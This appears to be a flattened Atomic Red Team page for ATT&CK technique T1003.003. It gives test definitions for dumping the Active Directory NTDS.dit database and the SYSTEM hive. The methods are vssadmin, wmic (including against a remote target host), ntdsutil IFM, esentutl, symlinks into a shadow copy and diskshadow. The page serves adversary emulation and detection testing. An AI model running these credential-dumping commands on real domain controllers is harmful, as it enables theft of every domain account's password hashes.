Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in %SystemRoot%\NTDS\Ntds.dit of a domain controller.(Citation: Wikipedia Active Directory)
In addition to looking for NTDS files on active Domain Controllers, adversaries may search for backups that contain the same or similar information.(Citation: Metcalf 2015)
The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.
* Volume Shadow Copy
* secretsdump.py
* Using the in-built Windows tool, ntdsutil.exe
* Invoke-NinjaCopy
Atomic Test #3 - Dump Active Directory Database with NTDSUtil
Atomic Test #5 - Create Volume Shadow Copy remotely with WMI
Atomic Test #6 - Create Volume Shadow Copy remotely (WMI) with esentutl
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
Supported Platforms: Windows
auto_generated_guid: dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f
| Name | Description | Type | Default Value | |——|————-|——|—————| | drive_letter | Drive letter to source VSC (including colon) | string | C:|
1
command_prompt
vssadmin.exe create shadow /for=#{drive_letter}
1
command_prompt
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
echo Sorry, Promoting this machine to a Domain Controller must be done manually
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
This test requires steps taken in the test “Create Volume Shadow Copy with vssadmin”. A successful test also requires the export of the SYSTEM Registry hive. This test must be executed on a Windows Domain Controller.
Supported Platforms: Windows
auto_generated_guid: c6237146-9ea6-4711-85c9-c56d263a6b03
| Name | Description | Type | Default Value | |——|————-|——|—————| | vsc_name | Name of Volume Shadow Copy | string | \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1| | extract_path | Path for extracted NTDS.dit | path | C:\Windows\Temp|
1
command_prompt
copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE
del "#{extract_path}\ntds.dit" >nul 2> nul
del "#{extract_path}\VSC_SYSTEM_HIVE" >nul 2> nul
del "#{extract_path}\SYSTEM_HIVE" >nul 2> nul
1
command_prompt
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
echo Sorry, Promoting this machine to a Domain Controller must be done manually
if not exist #{vsc_name} (exit /b 1)
echo Run "Invoke-AtomicTest T1003.003 -TestName 'Create Volume Shadow Copy with vssadmin'" to fulfill this requirement
if not exist #{extract_path} (exit /b 1)
mkdir #{extract_path}
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability uses the “IFM” or “Install From Media” backup functionality that allows Active Directory restoration or installation of subsequent domain controllers without the need of network-based replication.
Upon successful completion, you will find a copy of the ntds.dit file in the C:\Windows\Temp directory.
Supported Platforms: Windows
auto_generated_guid: 2364e33d-ceab-4641-8468-bfb1d7cc2723
| Name | Description | Type | Default Value | |——|————-|——|—————| | output_folder | Path where resulting dump should be placed | path | C:\Windows\Temp\ntds_T1003|
1
command_prompt
mkdir #{output_folder}
ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q
rmdir /q /s #{output_folder} >nul 2>&1
1
command_prompt
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
echo Sorry, Promoting this machine to a Domain Controller must be done manually
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
Supported Platforms: Windows
auto_generated_guid: 224f7de0-8f0a-4a94-b5d8-989b036c86da
| Name | Description | Type | Default Value | |——|————-|——|—————| | drive_letter | Drive letter to source VSC (including colon and backslash) | string | C:\|
1
command_prompt
wmic shadowcopy call create Volume=#{drive_letter}
1
command_prompt
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
echo Sorry, Promoting this machine to a Domain Controller must be done manually
This test is intended to be run from a remote workstation with domain admin context. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
Supported Platforms: Windows
auto_generated_guid: d893459f-71f0-484d-9808-ec83b2b64226
| Name | Description | Type | Default Value | |——|————-|——|—————| | drive_letter | Drive letter to source VSC (including colon and backslash) | string | C:\| | target_host | IP Address / Hostname you want to target | string | localhost|
1
command_prompt
wmic /node:"#{target_host}" shadowcopy call create Volume=#{drive_letter}
1
command_prompt
wmic /node:"#{target_host}" shadowcopy list brief
echo Sorry, can't connect to target host, check: network, firewall or permissions (must be admin on target)
This test is intended to be run from a remote workstation with domain admin context. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy created with esentutl.
Supported Platforms: Windows
auto_generated_guid: 21c7bf80-3e8b-40fa-8f9d-f5b194ff2865
| Name | Description | Type | Default Value | |——|————-|——|—————| | source_path | File to shadow copy | string | c:\windows\ntds\ntds.dit| | target_path | Target path of the result file | string | c:\ntds.dit| | target_host | IP Address / Hostname you want to target | string | localhost|
1
command_prompt
wmic /node:"#{target_host}" process call create "cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}"
1
command_prompt
wmic /node:"#{target_host}" shadowcopy list brief
echo Sorry, can't connect to target host, check: network, firewall or permissions (must be admin on target)
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
Supported Platforms: Windows
auto_generated_guid: 542bb97e-da53-436b-8e43-e0a7d31a6c24
| Name | Description | Type | Default Value | |——|————-|——|—————| | drive_letter | Drive letter to source VSC (including colon) | string | C:\|
1
powershell
1
(gwmi -list win32_shadowcopy).Create('#{drive_letter}','ClientAccessible')
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy.
Supported Platforms: Windows
auto_generated_guid: 21748c28-2793-4284-9e07-d6d028b66702
| Name | Description | Type | Default Value | |——|————-|——|—————| | drive_letter | Drive letter to source VSC (including colon) | string | C:| | symlink_path | symlink path | string | C:\Temp\vssstore|
1
command_prompt
vssadmin.exe create shadow /for=#{drive_letter}
mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
This test is intended to be run on a domain controller An alternative to using vssadmin to create a Volume Shadow Copy for extracting ntds.dit
Supported Platforms: Windows
auto_generated_guid: b385996c-0e7d-4e27-95a4-aca046b119a7
| Name | Description | Type | Default Value | |——|————-|——|—————| | filename | Location of the script | Path | PathToAtomicsFolder\T1003.003\src\diskshadow.txt|
1
command_prompt
mkdir c:\exfil
diskshadow.exe /s #{filename}